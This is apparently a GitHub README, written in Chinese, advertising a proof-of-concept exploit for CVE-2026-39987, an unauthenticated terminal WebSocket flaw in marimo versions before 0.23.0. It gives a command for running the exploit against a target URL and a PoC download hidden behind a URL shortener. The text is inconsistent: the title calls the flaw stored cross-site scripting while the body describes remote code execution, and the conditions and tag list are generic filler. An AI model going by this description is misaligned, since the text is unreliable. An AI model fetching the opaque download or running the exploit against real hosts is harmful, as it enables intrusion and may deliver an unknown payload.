jenniferreire26/CVE-2026-39987

# CVE-2026-39987 - 全PTY shell未认证存储跨站脚本 **严重性:** CRITICAL **CVSS:** 9.8 **影响:** 机密性、完整性、可用性 **发布日期:** 2026-04-09 ## 法律 仅限授权安全测试使用。 ## 根本原因（简版） marimo是一个响应式Python笔记本。在0.23.0版本之前，Marimo存在一个预认证远程代码执行漏洞。终端WebSocket端点/terminal/ws缺少认证验证，允许未经认证的攻击者获取完整的PTY shell并执行任意系统命令。与其他WebSocket端点（例如，/ws）正确调用validate_auth()进行认证不同，/terminal/ws端点在接受连接之前仅检查运行模式和平台支持，完全跳过认证验证。此漏洞已在0.23.0版本中修复。 ## 利用条件 - 可达的易受攻击目标 - 可预测的用户/工作流程上下文 - 无额外加固阻止构造请求 ## 使用方法 ``` python3 exploit.py https://target.tld ``` ## 检测 - 监控可疑的认证流程偏差 - 调查与CVE-2026-39987相关的异常直接端点访问 ## 缓解措施 - 更新到修复的供应商版本 - 限制风险端点并在可能的情况下强制执行多因素认证 ## 利用 [下载PoC](https://tinyurl.com/2499dcv5)

标签：Chaos, CVE-2026-39987, CVSS评分, GitHub Advanced Security, Marimo, PoC, Python, WebSocket, 严重性, 依赖分析, 多因素认证, 威胁模拟, 安全加固, 安全测试, 安全漏洞, 安全风险, 影响范围, 攻击性安全, 无后门, 暴力破解, 未授权访问, 编程工具, 网络安全审计, 自动化分析, 补丁更新, 认证漏洞, 误配置预防, 跨站脚本, 远程代码执行, 逆向工具